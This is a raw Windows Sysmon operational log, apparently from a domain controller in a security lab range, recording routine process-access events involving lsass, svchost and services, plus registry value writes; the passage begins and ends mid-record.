12:00:44.987{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.987{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.987{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.987{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.971{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.956{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.956{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{0c39d37d-e363-4d88-8ecd-11e79ce9ff0f}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x80000000000000001257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.956{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{0c39d37d-e363-4d88-8ecd-11e79ce9ff0f}\LastProbeTimeDWORD (0x6064646c) 13241300x80000000000000001256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.956{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{0C39D37D-E363-4D88-8ECD-11E79CE9FF0F}\DateLastConnectedBinary Data 10341000x80000000000000001255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.940{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.940{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-646A-6064-0A00-00000000AE01}8401184C:\Windows\system32\services.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.924{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.924{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.924{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\DriverMajorVersionDWORD (0x00000000) 13241300x80000000000000001240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 